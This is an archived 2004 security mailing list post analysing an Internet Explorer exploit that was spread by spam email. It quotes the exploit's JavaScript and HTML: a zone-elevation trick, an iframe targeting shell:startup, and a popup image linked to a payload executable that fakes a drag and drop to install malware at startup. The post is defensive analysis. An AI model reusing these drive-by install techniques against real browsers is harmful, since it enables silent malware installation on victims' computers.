lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <413DC14A.1030201@scanit.be>
From: alla at scanit.be (Alla Bezroutchko)
Subject: Virus loading through ActiveX-Exploit [Fwd:
 George Bush sniper-rifle shot!]

Martin Stricker wrote:
> I just got attached e-mail. On the linked website I found this exploit
> code (sorry for the line breaks):

As far as I can figure out it is a combination of two unpatched 
vulnerabilities. First it uses method assignement vulnerability 
(discovered by Paul (at) greyhats cjb net - see 
http://www.securityfocus.com/archive/1/368671) to get into Local 
Computer zone:

function govuln(){
     var w=window.open("javascript:wait for parent to change domain and 
then call location.assign with a javascript url");
     w.location.assign=location.assign;
     location.href="http://localhost";
}

Once in local computer zone it does what I believe is a variation of 
drag and drop file installation vulnerability discovered by http-equiv. 
  The interesting twist is that instead of tricking the user into 
dragging and dropping something (as mikx demonstrated at 
http://www.mikx.de/scrollbar/) they get the user to click on an image 
and then pull the window with the image from under the mouse to emulate 
drag and drop.

First they create an iframe with shell:startup folder.

   <iframe src=shell:startup HEIGHT=5000; WIDTH=5000 
style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;>
   </iframe>

Then they open a popup window that covers the whole screen and shows an 
image 1.gif using styles. The src of the image points to the payload 
executable. The image is an animated gif that first shows a counter and 
then says "Click to enter".

   <body onload=showpop()>
      <script>
          function showpop(){
               pop=window.createPopup();
               pop.document.body.style.margin=0;
               pop.document.body.innerHTML=txt.value;
               pop.show(100,100,screen.width+300,screen.height+300);
          }
      </script>
      <span style=position: absolute; left: 1; top: 1 id=absspan>
      </span>
      <textarea id=txt rows=1 cols=20 style=display:none>
          <html><body><table width=100% height=100%><tr ALIGN=LEFT 
VALIGN=TOP><br><center><img src=http://removed/payload.exe id=anch 
onmousedown=parent.pop.show(1,1,1,1); 
style=width=4000px;height=4000px;background-image:url('http://removed/1.gif');></a></td></tr></table>
      </textarea>
    </body>

When the user clicks on the image, the underlying popup window is moved 
by calling parent.pop.show(1,1,1,1) . So the image is effectively 
dragged into shell:startup, and the excutable is installed in the 
startup folder. This technique (pull the window from under the mouse to 
emulate drag and drop) AFAIK was first shown by Liu Die Yu in 
HijackClick 
(http://umbrella.name/originalvuln/msie/HijackClick/HijackClick-Content.HTM)

Another trick that they use is to download the payload executable first, 
using XmlHTTP object. I think this is to get it cached, and make the 
whole exploit more reliable.

Also interesting that they don't use
"a {behavior:url(#default#AnchorClick);}"
in this exploit which seems to be an essential part of http-equiv's and 
mikx's exploits.

Alla.
-- 
Scanit Belgium
Browser Security Test - http://bcheck.scanit.be/bcheck/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ